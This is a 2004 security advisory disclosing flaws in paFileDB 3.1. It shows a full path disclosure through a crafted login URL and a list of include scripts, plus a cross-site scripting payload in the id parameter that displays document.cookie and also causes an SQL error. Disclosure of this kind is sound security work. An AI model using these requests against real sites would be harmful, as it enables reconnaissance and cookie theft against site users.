Advisory: http://bichosoft.webcindario.com/advisory-04.txt


#########################################################################
###################### :.: DarkBicho :.: ################################
#								  	#
#   PROGRAM: paFileDB							#
#   VERSION: 3.1							#
#   URL: http://www.phparena.net					#
#   BUG: Multiple vulnerabilities					#
#   DATE: 27/04/2004							#
#   AUTHOR: DarkBicho							#
#           WebSite: http://www.darkbicho.tk				#
#           Email: darkbicho@peru.com					#
#           Team: Security Wari Projects <www.swp-zone.org>		#
#									#
#########################################################################
#########################################################################



1.- Vulnerabilities:
    ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke 
engine scripting files:

Fatal error: Call to undefined function: locbar() in 
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
   ----------------------------


  Cross-Site Scripting in id variable:


  
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>


paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near 
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE 
cat_id = '''


3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "El pisto es y sera peruano"

5.- Contact
    -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@peru.com


---------------------------------- [ EOF ] 
------------------------------------

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/